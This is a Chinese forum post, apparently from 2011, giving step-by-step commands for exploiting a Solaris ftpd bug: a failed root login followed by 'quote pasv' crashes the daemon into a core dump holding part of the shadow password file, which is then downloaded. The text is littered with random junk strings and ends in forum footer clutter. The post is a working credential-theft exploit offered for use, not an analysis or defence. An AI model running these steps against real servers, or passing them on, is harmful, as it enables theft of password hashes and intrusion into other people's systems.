該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG���,使得用戶可以獲得該機的口令文件���。具體過程如下:
3 |/ {9 u) Z0 {5 w0 G' a8 n+ _) M* n+ {* C
1.通過 ftp 正常登錄到目的主機上) P8 }. k& a( g- y; I8 |
0 _" D: i" F H
2.輸入如下命令序列:
; W. `% h' n; ]5 J' C# r2 \/ p0 y) W& [, a
ftp> user root wrongpasswd! [/ d5 l$ X; p7 R& M! P( l
, `# \% H; b; e5 i# ]! Iftp> quote pasv7 j; a" p, U9 q; S3 e# D
8 X; c' C y b
3.這時,ftpd會報錯退出��,同時會在當(dāng)前目錄下生成一個core�����,口令文件就包含在這個core中�。
9 w8 m9 S# D) n" Y7 p
; i" s* q. Y0 S( M4.再次進入FTP >get core
8 D4 \" `+ d- H5 @4 i0 G, \& v. g9 u
補充:雖然在core只有一部分shadow,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了- ^8 J" i. D3 k9 ?" D) c6 s; v
+ B) G% O* o8 p0 e S) n+ @ |
|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港
( 魯ICP備19052200號-1 )
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡